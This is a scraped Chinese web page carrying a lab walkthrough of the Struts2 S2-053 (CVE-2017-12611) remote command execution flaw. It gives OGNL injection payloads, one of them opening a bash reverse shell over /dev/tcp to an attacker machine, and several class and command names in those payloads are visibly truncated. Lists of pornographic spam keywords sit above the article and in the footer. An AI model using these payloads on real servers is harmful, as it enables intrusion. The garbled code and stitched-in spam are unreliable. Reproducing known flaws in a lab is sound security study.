• <em id="6vhwh"><rt id="6vhwh"></rt></em>

    <style id="6vhwh"></style>

    <style id="6vhwh"></style>
    1. <style id="6vhwh"></style>
        <sub id="6vhwh"><p id="6vhwh"></p></sub>
        <p id="6vhwh"></p>
          1. 国产亚洲欧洲av综合一区二区三区 ,色爱综合另类图片av,亚洲av免费成人在线,久久热在线视频精品视频,成在人线av无码免费,国产精品一区二区久久毛片,亚洲精品成人片在线观看精品字幕 ,久久亚洲精品成人av秋霞

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            更新時間:2023-12-09 21:24:29 閱讀: 評論:0

            2023年12月9日發(作者:年終獎怎么發)

            -

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            一:漏洞描述

            Struts2在使用Freemarker模塊引擎的時候,同時允許解析OGNL表達式。導致用戶輸入的數據本身不會被OGNL解析,但是由于被

            Freemarker解析一次后變成離開一個表達式,被OGNL解析第二次,導致任意命令執行漏洞。

            二:受影響的版本

            Struts 2.0.1-struts 2.3.33

            Struts 2.5-Struts 2.5.10

            三:環境搭建(192.168.33.144)

            1、使用docker搭建環境

            cd vulhub/struts2/s2-053

            2、一鍵搭建環境

            docker-compo up -d

            3、訪問:192.168.33.144:8080/。

            四:攻擊

            1、在Your url中寫入POC

            POC:

            %{(#dm=@ntext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['mphony.x

            ner']).(#ognlUtil=#tance(@il@class)).(#ludedPackageNa

            mes().clear()).(#ludedClass().clear()).(#berAccess(#dm)))).(#cmd='id').(#iswin=(@@getProperty('

            e').toLowerCa().contains('win'))).(#cmds=(#iswin?{'','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new sBuilder(#cmds)).(#ctErr

            orStream(true)).(#process=#()).(@s@toString(#utStream()))}2、點擊submit。4、反彈shell,把shell反彈到kali上(kali:192.168.33.146)nc -lvvp 1234填寫POC%{(#dm=@ntext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['ner']).(#ognlUtil=#tance(@il@class)).(#ludedPackageNames().clear()).(#ludedClass().clear()).(#berAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.33.146/1234 0>&1').(#iswin=(@@getProperty('').toLowerCa().contains('win'))).(#cmds=(#iswin?{'','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new sBuilder(#cmds)).(#ctErrorStream(true)).(#process=#()).(@s@toString(#utStream()))}kali上成功反彈shell

            -

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            本文發布于:2023-12-09 21:24:29,感謝您對本站的認可!

            本文鏈接:http://www.newhan.cn/zhishi/a/1702128269116497.html

            版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。

            本文word下載地址:CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現.doc

            本文 PDF 下載地址:CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現.pdf

            標簽:漏洞   解析   執行
            留言與評論(共有 0 條評論)
               
            驗證碼:
            推薦文章
            排行榜
            Copyright ?2019-2022 Comsenz Inc.Powered by ? 實用文體寫作網旗下知識大全大全欄目是一個全百科類寶庫! 優秀范文|法律文書|專利查詢|
            主站蜘蛛池模板: 亚洲欧美日韩国产成人| 少妇被粗大的猛烈进出69影院一| 国产一区二区不卡视频在线| 人妻丰满熟妇av无码区hd| 国产一区二区三区禁18| 国产成人精品18| 成 人 色 网 站免费观看| 亚洲中文字幕有综合久久| 性男女做视频观看网站| 少妇尿尿一区二区在线免费| 国产AV福利第一精品| 超碰成人人人做人人爽| 亚洲高清av一区二区| 69精品丰满人妻无码视频a片| 亚洲欧美日韩另类| 亚洲欧洲日产国产av无码| 亚洲人成无码网站18禁| 人妻少妇精品视频中文字幕国语| 国产极品AV嫩模| 99精品国产兔费观看久久99 | 精品亚洲综合一区二区三区| 秋霞在线观看秋| 亚洲中文字幕无码一区日日添| 国产在线乱子伦一区二区| 欧美19综合中文字幕| 亚洲国产成人精品av区按摩| www欧美在线观看| 欧美不卡视频一区发布| 日本亚洲一区二区精品久久| 一本一道久久久a久久久精品91| 久久久久久人妻无码| 国产福利精品一区二区| 韩国无码AV片在线观看网站| 久久亚洲精品11p| 国产一区二区黄色激情片| 成人国产亚洲精品一区二区| 在线中文字幕精品第5页| 亚洲性日韩精品一区二区三区| 亚洲男人第一无码av网站| 久久精品国产亚洲av天海翼| 国产农村妇女高潮大叫|